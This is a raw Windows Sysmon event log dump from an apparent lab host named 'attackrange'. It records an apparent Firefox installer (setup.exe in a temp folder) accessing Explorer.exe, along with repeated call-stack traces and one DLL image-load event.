4)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll2021-01-18 13:59:52.239 10341000x800000000000000014564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.239{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
